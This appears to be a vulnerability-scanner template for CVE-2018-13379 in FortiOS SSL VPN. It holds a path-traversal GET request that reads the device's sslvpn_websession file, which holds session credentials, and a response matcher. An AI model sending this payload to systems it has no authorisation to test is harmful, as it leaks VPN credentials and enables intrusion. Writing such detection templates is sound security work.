id: CVE-2018-13379 info: name: FortiOS - Credentials Disclosure author: organiccrap severity: high tags: cve,cve2018,fortios requests: - method: GET path: - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" matchers: - type: word words: - "var fgt_lang"